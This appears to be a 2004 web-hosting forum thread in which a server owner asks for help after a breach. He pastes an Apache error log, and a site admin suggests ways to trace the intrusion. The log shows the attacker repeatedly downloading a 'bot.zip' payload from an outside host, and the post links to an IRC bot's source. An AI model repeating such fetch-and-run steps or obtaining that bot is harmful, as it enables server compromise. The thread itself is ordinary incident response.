Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Ok, they got in, someone know how?
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
Dauthus
Worker
Worker



Joined: Oct 07, 2003
Posts: 211
PostPosted: Mon Aug 30, 2004 9:55 pm Reply with quote
From what I can tell, (and I ain't no expert) my dedicated server has been breached. I am going to list a portion of my error_log below. I only run nuke, and have the latest version of sentinel installed. I also only run phpnuke on my websites.

Can anyone venture to guess just how this a-hole got in? The "bot.zip" they are running is here:

http://packetstormsecurity.nl/irc/kaiten.c

error_log below:

Quote:
[Mon Aug 30 04:10:08 2004] [notice] Digest: generating secret for digest authentication ...
[Mon Aug 30 04:10:08 2004] [notice] Digest: done
[Mon Aug 30 04:10:08 2004] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Mon Aug 30 04:10:08 2004] [notice] LDAP: SSL support unavailable
[Mon Aug 30 04:10:09 2004] [notice] httpdmon: httpdmon_init
[Mon Aug 30 04:10:09 2004] [notice] bandwidth monitoring enabled (mapping file: /etc/virtualhosting/mappings/apache.domainmap)
[Mon Aug 30 04:10:10 2004] [notice] Apache/2.0.48 (Fedora) configured -- resuming normal operations
--07:42:57-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]

0K .......... .......... .......... .. 100% 281.53 KB/s

07:42:57 (281.53 KB/s) - `bot.zip' saved [33730/33730]

% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed

3 33730 3 1193 0 0 535 0 0:01:02 0:00:02 0:01:00 535
100 33730 100 33730 0 0 14365 0 0:00:02 0:00:02 0:00:00 262k
sh: line 1: lynx: command not found
--07:43:00-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]

0K .......... .......... .......... .. 100% 274.50 KB/s

07:43:00 (274.50 KB/s) - `bot.zip' saved [33730/33730]

% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed

3 33730 3 1193 0 0 10373 0 0:00:03 0:00:00 0:00:03 10373
29 33730 29 9881 0 0 53123 0 0:00:00 0:00:00 0:00:00 119k
100 33730 100 33730 0 0 141k 0 0:00:00 0:00:00 0:00:00 269k
sh: line 1: lynx: command not found
--07:43:01-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]

0K .......... .......... .......... .. 100% 276.80 KB/s

07:43:01 (276.80 KB/s) - `bot.zip' saved [33730/33730]

% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed

3 33730 3 1193 0 0 10464 0 0:00:03 0:00:00 0:00:03 10464
100 33730 100 33730 0 0 141k 0 0:00:00 0:00:00 0:00:00 267k
sh: line 1: lynx: command not found
--07:43:02-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]

0K .......... .......... .......... .. 100% 272.23 KB/s

07:43:02 (272.23 KB/s) - `bot.zip' saved [33730/33730]

% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed

3 33730 3 1193 0 0 10557 0 0:00:03 0:00:00 0:00:03 10557
100 33730 100 33730 0 0 140k 0 0:00:00 0:00:00 0:00:00 262k
sh: line 1: lynx: command not found
--07:43:02-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]

0K .......... .......... .......... .. 100% 274.50 KB/s

07:43:02 (274.50 KB/s) - `bot.zip' saved [33730/33730]

% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed

3 33730 3 1193 0 0 10651 0 0:00:03 0:00:00 0:00:03 10651
100 33730 100 33730 0 0 141k 0 0:00:00 0:00:00 0:00:00 262k
sh: line 1: lynx: command not found


I am shutting down the server until it is fixed, but some thoughts on how they got in would be nice. It may not be through PHPNuke, but I just want to make sure.
 
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088
PostPosted: Mon Aug 30, 2004 9:59 pm Reply with quote
What did they do? That usually helps isolate the exploit.

Do you have Coppermine or MyE_Gallery?
Was it phpnuke or cpgnuke or what?
Did they add authors?
 
View user's profile Send private message
Dauthus
PostPosted: Mon Aug 30, 2004 10:05 pm Reply with quote
As far as I can tell, they only caused my email on two accounts to stop functioning.

I have Coppermine (with all the latest security patches) installed

Running Nuke 7.0 and 7.2 with the latest patches.

No authors were added that I can tell.

As far as tracking what exactly they did, I can't tell. Any folders on the server which were modified today, are either temp folders which are empty, or are folders where the files have not been modified or created today. They left a hard trail to follow.
 
Raven
PostPosted: Mon Aug 30, 2004 10:09 pm Reply with quote
email on your server or w/i nuke? if on your server then you're right; your server is breached. You will need to check your server logs, probably ftp to see if that IP is on the ftp log.
 
Dauthus
PostPosted: Mon Aug 30, 2004 10:15 pm Reply with quote
email was on the server. Not nuke. Checking the IP logs as I type. Raven, you ever hear of this hack before? Any ideas here?
 
Raven
PostPosted: Mon Aug 30, 2004 10:26 pm Reply with quote
No, but in order to do this they would probably have deposited 1 or more files on your server. Do you host this yourself or with someone? What front-end do you use if it's hosted? i would seacrh the Internet for soemthing like 'email hacked cpanel' or something depending on your front end. Can you serach your server for files with today's date?
 
Dauthus
PostPosted: Mon Aug 30, 2004 10:32 pm Reply with quote
It is a hosted dedicated server. That make sense? I will have to look up the SSH parameters for finding files with today's date.

Ensim basic is the cp.

Thanks for the help. I will let you know if I come up with anything. I am going to have the host do a check and see what they find. If nothing else looks like a full software reinstall.
 
Raven
PostPosted: Mon Aug 30, 2004 10:44 pm Reply with quote
Fedora (I just noticed). There are several alerts out right now on exploits with Fedora. This could be an exploit with Sendmail even. I did a google search on 'fedora exploits email' and here's one that came back as an example http://www.webhostingtalk.com/showthread.php?threadid=260623 - may not apply but there are many more.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©